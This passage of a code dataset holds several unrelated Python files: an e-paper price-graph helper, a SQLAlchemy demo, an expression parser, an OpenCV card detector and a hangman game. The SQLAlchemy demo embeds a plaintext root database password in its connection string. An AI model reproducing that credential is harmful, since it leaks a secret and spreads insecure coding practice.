draw = draw_text(\r\n display,\r\n draw,\r\n message=message,\r\n font_size=font_sizes[location],\r\n y_align=location,\r\n )\r\n return draw\r\n\r\n\r\ndef draw_graph_data(display, draw, data, simple_messages, graph_range):\r\n \"\"\"Draw graph mode data\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n data (DataFrame): DataFrame given by get_data\r\n simple_messages (dict): output of draw_simple_messages()\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n # Display text\r\n message = f\"{simple_messages['top']}: {simple_messages['middle']}\"\r\n font = ImageFont.truetype(FredokaOne, 25)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 0), message, display.BLACK, font)\r\n message = f\"{simple_messages['bottom']}\"\r\n font = ImageFont.truetype(FredokaOne, 15)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 25), message, display.BLACK, font)\r\n\r\n # Display graph\r\n x_margin_right = 50\r\n\r\n y_margin_top = 50\r\n y_margin_bot = 5\r\n y_range = display.HEIGHT - y_margin_top - y_margin_bot\r\n\r\n price_data = list(data[\"close\"])[-graph_range:]\r\n max_price = round(max(price_data), 2)\r\n min_price = round(min(price_data), 2)\r\n\r\n x_list = []\r\n y_list = []\r\n\r\n # y: change scale from [max_price, max_price] to [0, display.HEIGHT]\r\n y_data = [\r\n (display.HEIGHT * (y - min_price)) / (max_price - min_price) for y in price_data\r\n ]\r\n for i in range(graph_range):\r\n x = i * (display.WIDTH - x_margin_right) / graph_range\r\n y = y_data[i]\r\n y = display.HEIGHT - y # 0 on bottom\r\n y = y / display.HEIGHT * y_range + y_margin_top # apply limited range (y_range)\r\n\r\n x_list.append(x)\r\n y_list.append(y)\r\n\r\n draw.line(list(zip(x_list, y_list)), fill=display.BLACK, width=2)\r\n\r\n # Display min price and max price on right side\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, y_margin_top - 3),\r\n str(max_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, display.HEIGHT - 15),\r\n str(min_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n return draw\r\n","sub_path":"ticker/display_utils.py","file_name":"display_utils.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"418843672","text":"# 使用SQLAlchemy \n# ORM, 把关系数据库的表结构映射到对象上\nimport 
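The y-axis mapping in draw_graph_data above is spread over three steps and divides by (max_price - min_price), which raises ZeroDivisionError on a perfectly flat price series. A hedged single-step helper (rescale is an illustrative name):

def rescale(value, src_min, src_max, dst_min, dst_max):
    # Linearly map value from [src_min, src_max] onto [dst_min, dst_max].
    if src_max == src_min:  # flat data: park the line mid-range instead of crashing
        return (dst_min + dst_max) / 2
    t = (value - src_min) / (src_max - src_min)
    return dst_min + t * (dst_max - dst_min)

# e.g. map a price onto screen coordinates, flipped so larger values sit higher:
# y = rescale(price, min_price, max_price, display.HEIGHT - y_margin_bot, y_margin_top)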
pymysql\n\nfrom sqlalchemy import Column, String, create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nbase = declarative_base()\n\nclass User(base):\n __tablename__ = 'person'\n\n id = Column(String(20),primary_key=True)\n name = Column(String(20))\n\n # 一对多:\n # books = relationship('Book')\n\n# class Book(base):\n# __tablename__ = 'book'\n# id = Column(String(20), primary_key=True)\n# name = Column(String(20))\n# user_id = Column(String(20), ForeignKey('user.id'))\n# 外键\n\nengine = create_engine('mysql+pymysql://root:Zjf9437879228.@localhost:3306/test_py')\n# '数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'\nDBSession = sessionmaker(bind=engine)\n\n# 查询\nsession = DBSession()\nuser = session.query(User).filter(User.id == '3').one()\nprint(user)\nprint('type:',type(user))\nprint('name:',user.name)\n# session.close()\n\n# 插入\nnew_user = User(id='4', name='Bob')\n\nsession.add(new_user)\nsession.commit()\nsession.close()","sub_path":"SQL/SQLAlchemy123.py","file_name":"SQLAlchemy123.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"306874128","text":"from Wpp.expr.Node import Node\nfrom Wpp.expr.operations import binOps, unOps, ternaryPrior, fnArgsPrior, squareBracketPrior\n\ndef scanLexems(lexems, pos, terminators, context):\n\t\"Анализ списка лексем. На выходе единственный узел и позиция последней использованной лекскмы\"\n\tstack = []\n\tstep = 1\n\twhile pos < len(lexems):\n\t\tvalue, lexemType, constType = lexems[pos]\n\t\t# Проверка на команду - завершитель\n\t\tif lexemType == 'cmd' and value in terminators:\n\t\t\tbreak\n\t\tpos += 1\n\t\tif stack and stack[-1].isSpecMinus(lexemType, constType):\n\t\t\t# Специальный случай - замена унарного минуса к числовой константе на отрицательное число \n\t\t\tstack[-1] = Node('arg', lexemType, '-'+value, constType, True)\n\t\telif lexemType == 'const' or lexemType == 'id':\n\t\t\tstack.append(Node('arg', lexemType, value, constType, True))\n\t\telif lexemType == 'cmd':\n\t\t\tif stack and stack[-1].bArgument:\n\t\t\t\tif value == '?':\n\t\t\t\t\tprior = ternaryPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('ternar', lexemType, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\targ2, pos = scanLexems(lexems, pos, {':'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\t\topNode.args.append(arg2)\n\t\t\t\telif value == '(':\n\t\t\t\t\t# Вызов функции\n\t\t\t\t\tprior = fnArgsPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('call', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\tif lexems[pos][0] == ')':\n\t\t\t\t\t\tpos += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\twhile True:\n\t\t\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {',', ')'}, context)\n\t\t\t\t\t\t\ttermCmd, termType, termX = lexems[pos]\n\t\t\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\t\t\tpos += 1\n\t\t\t\t\t\t\tif termCmd == ')':\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\telif value == '[':\n\t\t\t\t\tprior = squareBracketPrior\n\t\t\t\t\t# optimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('index', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {']'}, context)\n\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\tpos += 1\n\t\t\t\telse:\n\t\t\t\t\t# Бинарный оператор\n\t\t\t\t\tprior = binOps.get(value)\n\t\t\t\t\tif not 
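The SQLAlchemy note above commits its insert with no error handling, so a failed flush leaves the session in a broken state. A hedged sketch of the usual commit/rollback discipline, reusing the note's own DBSession and User objects:

session = DBSession()
try:
    session.add(User(id='5', name='Carol'))
    session.commit()
except Exception:
    session.rollback()  # a failed flush otherwise leaves the session unusable
    raise
finally:
    session.close()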
prior:\n\t\t\t\t\t\tcontext.throwError('Invalid binary operation \"%s\"' % (value))\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('binop', lexemType, value, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\tstack.append(opNode)\n\t\t\telse:\n\t\t\t\t# Унарный оператор\n\t\t\t\tif value == '(':\n\t\t\t\t\t# Скобки для группировки операций\n\t\t\t\t\topNode, pos = scanLexems(lexems, pos, {')'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\telif value == '[':\n\t\t\t\t\t# Значение типа массива\n\t\t\t\t\topNode, pos = createArray(lexems, pos, context)\n\t\t\t\telse:\n\t\t\t\t\tprior = unOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid unary operation ' + value)\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('unop', lexemType, value, prior=prior)\n\t\t\t\tstack.append(opNode)\n\tif pos == len(lexems):\n\t\tcontext.throwError('No end of expression found')\n\toptimizeStack(stack, 100, context)\n\tif len(stack) != 1:\n\t\t# Если узлы не сошлись в один, то это неправильное выражение. Типа x 1\n\t\tcontext.throwError('Invalid expression: [' + ', '.join([str(i) for i in stack])+']')\n\treturn (stack[0], pos)\n\ndef createArray(lexems, pos, context):\n\tvalue = Node('array', 'array', bArgument = True)\n\tdivider = ''\n\twhile divider != ']':\n\t\tnode, pos = scanLexems(lexems, pos, {',', ']'}, context)\n\t\tdivider, t, x = lexems[pos]\n\t\tvalue.args.append(node)\n\t\tpos += 1\n\treturn value, pos\n\ndef optimizeStack(stack, prior, context):\n\tif not stack:\n\t\treturn\n\n\twhile True:\n\t\tlast = stack.pop()\n\t\tif not last.bArgument:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\tif not stack:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top = stack.pop()\n\t\tif op.bArgument:\n\t\t\tcontext.throwError('Expected operation instead of '+str(op))\n\t\tif op.prior > prior:\n\t\t\tstack.append(op)\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top.args.append(last)\n\t\top.bArgument = True\n\t\tstack.append(op)\n","sub_path":"src1/Wpp/expr/scanLexems.py","file_name":"scanLexems.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173111121","text":"#\n# Based on: https://github.com/EdjeElectronics/OpenCV-Playing-Card-Detector\n#\nimport json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom poke_visor.classes.card_detector.poker_card_info import PokerCardInfo\nfrom poke_visor.classes.card_detector.train_ranks import TrainRanks\nfrom poke_visor.classes.card_detector.train_suits import TrainSuits\n# Adaptive threshold levels\nfrom poke_visor.enums.card_rank_enum import CardRank\nfrom poke_visor.enums.card_suit_enum import CardSuit\n\n# Constants #\n\nBKG_THRESH = 70\nCARD_THRESH = 30\n\n# Width and height of card corner, where rank and suit are\nCORNER_WIDTH = 64\nCORNER_HEIGHT = 160\n\n# Dimensions of rank train images\nRANK_WIDTH = 70\nRANK_HEIGHT = 125\n\n# Dimensions of suit train images\nSUIT_WIDTH = 70\nSUIT_HEIGHT = 100\n\nRANK_DIFF_MAX = 2000\nSUIT_DIFF_MAX = 700\n\nCARD_MAX_AREA = 240000\nCARD_MIN_AREA = 12500\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef _load_settings():\n global CARD_MAX_AREA, CARD_MIN_AREA\n\n if os.path.isfile(\"config.json\"):\n with open(\"config.json\", \"r\") as file:\n config_json = json.loads(file.read())\n if \"card-detector\" in config_json:\n settings = json.loads(file.read())[\"card-detector\"]\n CARD_MAX_AREA = settings[\"card-max-area\"]\n CARD_MIN_AREA = 
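scanLexems and optimizeStack above implement operator-precedence parsing over Wpp Node objects: pending operators sit on a stack and are reduced whenever an incoming operator does not bind tighter. The toy below shows the same idea on plain numbers; note it uses the conventional numbering (larger priority binds tighter), which is inverted relative to the Wpp scheme, where a smaller prior binds tighter and optimizeStack reduces while op.prior <= prior.

BIN_PRIOR = {'+': 1, '-': 1, '*': 2, '/': 2}

def eval_expr(tokens):
    # Evaluate e.g. ['1', '+', '2', '*', '3'] -> 7.0 with a value stack
    # and an operator stack.
    vals, ops = [], []

    def reduce_once():
        op = ops.pop()
        b, a = vals.pop(), vals.pop()
        vals.append({'+': a + b, '-': a - b, '*': a * b, '/': a / b}[op])

    for tok in tokens:
        if tok in BIN_PRIOR:
            # Reduce everything that binds at least as tightly as `tok`.
            while ops and BIN_PRIOR[ops[-1]] >= BIN_PRIOR[tok]:
                reduce_once()
            ops.append(tok)
        else:
            vals.append(float(tok))
    while ops:
        reduce_once()
    return vals[0]

assert eval_expr(list('1+2*3')) == 7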
settings[\"card-min-area\"]\n\n\n_load_settings()\n\n\ndef load_ranks(filepath):\n \"\"\"Loads rank images from directory specified by filepath. Stores\n them in a list of Train_ranks objects.\"\"\"\n\n train_ranks = []\n\n for rank in CardRank:\n if rank == CardRank.unknown:\n continue\n\n train_ranks.append(TrainRanks())\n last = len(train_ranks) - 1\n train_ranks[last].rank = rank\n filename = str(rank.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card rank file not found : {filepath + filename}\")\n\n train_ranks[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_ranks\n\n\ndef load_suits(filepath):\n \"\"\"Loads suit images from directory specified by filepath. Stores\n them in a list of Train_suits objects.\"\"\"\n\n train_suits = []\n\n for suit in CardSuit:\n if suit == CardSuit.unknown:\n continue\n\n train_suits.append(TrainSuits())\n last = len(train_suits) - 1\n train_suits[last].suit = suit\n filename = str(suit.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card suit file not found : {filepath + filename}\")\n\n train_suits[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_suits\n\n\ndef preprocess_image(image):\n \"\"\"Returns a grayed, blurred, and adaptively thresholded camera image.\"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (3, 3), 0)\n\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 5, 2)\n return thresh\n\n\ndef find_cards(thresh_image):\n \"\"\"Finds all card-sized contours in a thresholded camera image.\n Returns the number of cards, and a list of card contours sorted\n from largest to smallest.\"\"\"\n\n # Find contours and sort their indices by contour size\n cnts, hier = cv2.findContours(thresh_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n index_sort = sorted(range(len(cnts)), key=lambda i_: cv2.contourArea(cnts[i_]), reverse=True)\n\n # If there are no contours, do nothing\n if len(cnts) == 0:\n return [], []\n\n # Otherwise, initialize empty sorted contour and hierarchy lists\n cnts_sort = []\n hier_sort = []\n cnt_is_card = np.zeros(len(cnts), dtype=int)\n\n # Fill empty lists with sorted contour and sorted hierarchy. Now,\n # the indices of the contour list still correspond with those of\n # the hierarchy list. The hierarchy array can be used to check if\n # the contours have parents or not.\n for i in index_sort:\n cnts_sort.append(cnts[i])\n hier_sort.append(hier[0][i])\n\n # Determine which of the contours are cards by applying the\n # following criteria: 1) Smaller area than the maximum card size,\n # 2), bigger area than the minimum card size, 3) have no parents,\n # and 4) have four corners\n\n for i in range(len(cnts_sort)):\n size = cv2.contourArea(cnts_sort[i])\n peri = cv2.arcLength(cnts_sort[i], True)\n approx = cv2.approxPolyDP(cnts_sort[i], 0.01 * peri, True)\n\n if CARD_MAX_AREA > size > CARD_MIN_AREA and len(approx) == 4:\n cnt_is_card[i] = 1\n\n return cnts_sort, cnt_is_card\n\n\ndef preprocess_card(contour, image) -> PokerCardInfo:\n \"\"\"Uses contour to find information about the poker card. 
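_load_settings above has a real bug: file.read() is called a second time inside the inner `if`, and since the file pointer is already at the end it returns an empty string, so json.loads('') raises ValueError and the card-area overrides are never applied. A hedged corrected sketch (load_card_area_settings is an illustrative name, not part of the original module):

import json
import os

def load_card_area_settings(path="config.json", default_min=12500, default_max=240000):
    # Parse the config file exactly once and fall back to the defaults
    # when the file or the "card-detector" section is absent.
    if not os.path.isfile(path):
        return default_min, default_max
    with open(path, "r") as fh:
        config = json.load(fh)
    settings = config.get("card-detector", {})
    return (settings.get("card-min-area", default_min),
            settings.get("card-max-area", default_max))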
Isolates rank\n and suit images from the card.\"\"\"\n\n # Initialize new card_info object\n card_info = PokerCardInfo()\n\n card_info.contour = contour\n\n # Find perimeter of card and use it to approximate corner points\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.01 * peri, True)\n pts = np.float32(approx)\n\n # Find width and height of card\"s bounding rectangle\n x, y, w, h = cv2.boundingRect(contour)\n card_info.width, card_info.height = w, h\n\n # Find center point of card by taking x and y average of the four corners.\n average = np.sum(pts, axis=0) / len(pts)\n cent_x = int(average[0][0])\n cent_y = int(average[0][1])\n card_info.center = [cent_x, cent_y]\n\n # Warp card into 256x360 flattened image using perspective transform\n # noinspection PyTypeChecker\n warp = cv2.resize(_flattener(image, pts, w, h), (256, 360))\n\n # Grab corner of warped card image and do a 4x zoom\n corner = warp[0:CORNER_HEIGHT, 0:CORNER_WIDTH]\n corner_zoom = cv2.resize(corner, (0, 0), fx=4, fy=4)\n\n # Sample known white pixel intensity to determine good threshold level\n white_level = corner_zoom[corner_zoom.shape[0] - 1, int((CORNER_WIDTH * 4) / 2)]\n thresh_level = white_level - CARD_THRESH\n if thresh_level <= 0:\n thresh_level = 1\n _, poker_thresh = cv2.threshold(corner_zoom, thresh_level, 255, cv2.THRESH_BINARY_INV)\n\n # Split in to top and bottom half (top shows rank, bottom shows suit)\n rank = poker_thresh[0:round(CORNER_HEIGHT * 2), 0:CORNER_WIDTH * 4]\n suit = poker_thresh[round(CORNER_HEIGHT * 2):CORNER_HEIGHT * 4, 0:CORNER_WIDTH * 4]\n\n # Find rank contour and bounding rectangle, isolate and find largest contour\n rank_cnts, hier = cv2.findContours(rank, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rank_cnts = sorted(rank_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker rank\n # image to match dimensions of the train rank image\n if len(rank_cnts) != 0:\n x1, y1, w1, h1 = cv2.boundingRect(rank_cnts[0])\n rank_roi = rank[y1:y1 + h1, x1:x1 + w1]\n rank_sized = cv2.resize(rank_roi, (RANK_WIDTH, RANK_HEIGHT), 0, 0)\n card_info.rank_img = rank_sized\n\n # Find suit contour and bounding rectangle, isolate and find largest contour\n suit_cnts, hier = cv2.findContours(suit, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n suit_cnts = sorted(suit_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker suit\n # image to match dimensions of the train suit image\n if len(suit_cnts) != 0:\n x2, y2, w2, h2 = cv2.boundingRect(suit_cnts[0])\n suit_roi = suit[y2:y2 + h2, x2:x2 + w2]\n suit_sized = cv2.resize(suit_roi, (SUIT_WIDTH, SUIT_HEIGHT), 0, 0)\n card_info.suit_img = suit_sized\n\n return card_info\n\n\ndef match_card(card, train_ranks, train_suits):\n \"\"\"Finds best rank and suit matches for the poker card. 
Differences\n the poker card rank and suit images with the train rank and suit images.\n The best match is the rank or suit image that has the least difference.\"\"\"\n\n best_rank_match_diff = 10000\n best_suit_match_diff = 10000\n best_rank_match_name = CardRank.unknown\n best_suit_match_name = CardSuit.unknown\n best_rank_name = CardRank.unknown\n best_suit_name = CardSuit.unknown\n\n # If no contours were found in poker card in preprocess_card function,\n # the img size is zero, so skip the differencing process\n # (card will be left as unknown)\n if (len(card.rank_img) != 0) and (len(card.suit_img) != 0):\n\n # Difference the poker card rank image from each of the train rank images,\n # and store the result with the least difference\n for t_rank in train_ranks:\n\n diff_img = cv2.absdiff(card.rank_img, t_rank.img)\n rank_diff = int(np.sum(diff_img) / 255)\n\n if rank_diff < best_rank_match_diff:\n best_rank_match_diff = rank_diff\n best_rank_name = t_rank.rank\n\n # Same process with suit images\n for t_suit in train_suits:\n\n diff_img = cv2.absdiff(card.suit_img, t_suit.img)\n suit_diff = int(np.sum(diff_img) / 255)\n\n if suit_diff < best_suit_match_diff:\n best_suit_match_diff = suit_diff\n best_suit_name = t_suit.suit\n\n # Combine best rank match and best suit match to get poker card\"s identity.\n # If the best matches have too high of a difference value, card identity\n # is still unknown\n if best_rank_match_diff < RANK_DIFF_MAX:\n best_rank_match_name = best_rank_name\n\n if best_suit_match_diff < SUIT_DIFF_MAX:\n best_suit_match_name = best_suit_name\n\n # Return the identity of the card and the quality of the suit and rank match\n return best_rank_match_name, best_suit_match_name, best_rank_match_diff, best_suit_match_diff\n\n\ndef draw_results(image, card):\n \"\"\"Draw the card name and contour on the camera image.\"\"\"\n\n x = card.center[0]\n y = card.center[1]\n\n rank_name = card.best_rank_match\n suit_name = card.best_suit_match\n\n # Draw card name twice, so letters have black outline\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n return image\n\n\ndef _flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\n See www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is \"diamond\" oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if 0.8 * h < w < 1.2 * h: # If 
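match_card above scores each candidate rank and suit by summing an absolute-difference image and keeping the smallest total. Factored out as a hedged helper (diff_score is an illustrative name; both images must already share dimensions, which the resizes in preprocess_card guarantee):

import cv2
import numpy as np

def diff_score(img_a, img_b):
    # Pixel-wise mismatch between two same-sized grayscale images;
    # lower means a closer match.
    return int(np.sum(cv2.absdiff(img_a, img_b)) / 255)

# best = min(train_ranks, key=lambda t: diff_score(card.rank_img, t.img))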
card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n max_width = 200\n max_height = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [max_width - 1, 0], [max_width - 1, max_height - 1], [0, max_height - 1]], np.float32)\n m = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, m, (max_width, max_height))\n warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n\n return warp\n","sub_path":"application/poke_visor/logic/card_detector/card_detection_functions.py","file_name":"card_detection_functions.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"66896693","text":"import random\nimport sys\nimport os\n\nclass HangMan:\n\n def __init__(self):\n self.capitals = []\n self.cap_name_output = []\n self.not_in_word = []\n self.cap_name = []\n self.choice = ' '\n self.type_letter = ' '\n self.type_word = ' '\n\n\n # importing capital cities from file, storing them in list,\n # choosing one of them radomly\n def make_capitals(self):\n with open(\"capitals.txt\", \"r\") as capital:\n for item in capital:\n self.capitals.append(item.replace('\\n', ''))\n capital.close()\n self.cap_name = list(random.choice(self.capitals))\n\n\n # filling another list with dashes and * if there is a space\n def make_dashes(self):\n for letter in self.cap_name:\n for n, i in enumerate(self.cap_name):\n if i == ' ':\n self.cap_name[n] = '*'\n if letter == '*':\n self.cap_name_output.append('*')\n else:\n self.cap_name_output.append('_ ')\n\n\n # chcecking player's lifes, close program when lifes reache\n def end_game(self,lifes):\n if lifes == 0:\n print('\\033[91m' + 'GAME OVER!' + '\\033[0m')\n sys.exit()\n\n\n #checking user input if it is letter or space\n def check_letter(self):\n while not len(self.type_letter) == 1:\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n while not self.type_letter.isalpha():\n print('You can type only letters and spaces. 
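The corner bookkeeping in _flattener is the classic four-point-transform trick: the top-left corner has the smallest x+y sum, the bottom-right the largest, and the y-x difference separates top-right from bottom-left. A hedged standalone version for (4, 2) point arrays (order_corners is an illustrative name, and like the sum/diff trick itself it is only unambiguous when the card is not diamond-oriented):

import numpy as np

def order_corners(pts):
    # Order 4 points as [top-left, top-right, bottom-right, bottom-left].
    rect = np.zeros((4, 2), dtype="float32")
    s = pts.sum(axis=1)                 # x + y
    d = np.diff(pts, axis=1).ravel()    # y - x
    rect[0] = pts[np.argmin(s)]         # top-left: smallest x + y
    rect[2] = pts[np.argmax(s)]         # bottom-right: largest x + y
    rect[1] = pts[np.argmin(d)]         # top-right: smallest y - x
    rect[3] = pts[np.argmax(d)]         # bottom-left: largest y - x
    return rect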
Try again.')\n self.type_letter = input('Type letter: ').upper()\n\n\n def letter(self,lifes):\n if self.not_in_word != []:\n print(\"Used letters: \" + ', '.join(self.not_in_word))\n if '_ ' in self.cap_name_output:\n self.type_letter = input('Type letter: ').upper()\n self.check_letter()\n if self.type_letter not in self.cap_name:\n self.not_in_word.append(self.type_letter)\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.game(lifes - 1)\n for letter, i in enumerate(self.cap_name):\n if i == self.type_letter:\n self.cap_name_output[letter] = self.type_letter\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if '_ ' not in self.cap_name_output:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n self.game(lifes)\n\n\n # checking if in entered word(s) is space and changing spaces for *\n # comparing typed word with capital name\n def word(self,lifes):\n self.type_word = list(input('Type word: ').upper())\n if ' ' in self.type_word:\n for n, i in enumerate(self.type_word):\n if i == ' ':\n self.type_word[n] = '*'\n if self.type_word == self.cap_name:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n else:\n self.game(lifes - 1)\n\n\n # asking user for input, runs appropriate function depending on input\n def game(self,lifes):\n print('\\nYou have', lifes, ' lifes.')\n self.end_game(lifes)\n self.choice = input('Would You like to guess a letter or whole word(s)? ').lower()\n if self.choice == 'letter' or self.choice == 'l':\n self.letter(lifes)\n elif self.choice == 'word' or self.choice == 'w':\n print('\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.word(lifes)\n else:\n print('You can chose only between letter or word, type again!')\n self.game(lifes)\n\n\n # user can set difficulty level, to determine number of lifes\n def levels(self):\n input_level = input('Do you chose EASY, MEDIUM or HARD level? ').lower()\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if input_level == 'easy' or input_level == 'e':\n self.game(15)\n elif input_level == 'medium' or input_level == 'm':\n self.game(10)\n elif input_level == 'hard' or input_level == 'h':\n self.game(5)\n else:\n print('There no such level, type again!')\n self.levels()\n\n # star game function\n def start_game(self):\n start = input('Do sure you want start the game and save The World? There will be no return...(enter \"yes\" to continue) ').lower()\n if start == 'yes' or start == 'y':\n self.levels()\n else:\n sys.exit()\n\n def main(self):\n os.system('clear')\n print('\\033[93m' + 'Evil ' + '\\033[91m' + 'SKYNET' + '\\033[93m' + ''' is trying to take control over the world.\n Guess a names of European capital that are his targets and safe the world!\\n''' + '\\033[0m')\n self.make_capitals()\n self.make_dashes()\n self.start_game()\n self.levels\n\nnew_game = HangMan()\nnew_game.main()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421991313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload and install sklearn on your computer (e.g. download the Anaconda distribution) or \nuse a Jupyter notebook on Google Colab (free).\n Download the sample dataset assigData4.csv. This file has 1200 positive and 6000 negative samples. Each sample 215 features \n (assume the first feature is “feature 1” below). 
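check_letter above validates the length and the alphabet in two separate back-to-back loops, so an entry like "ab" typed at the second prompt slips through: it is alphabetic, and the length loop has already finished. A hedged combined loop that rechecks both conditions on every attempt (ask_letter is an illustrative name):

def ask_letter(prompt='Type letter: '):
    # Keep asking until the input is exactly one alphabetic character.
    letter = input(prompt).upper()
    while not (len(letter) == 1 and letter.isalpha()):
        print('You can type only single letters. Try again.')
        letter = input(prompt).upper()
    return letter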
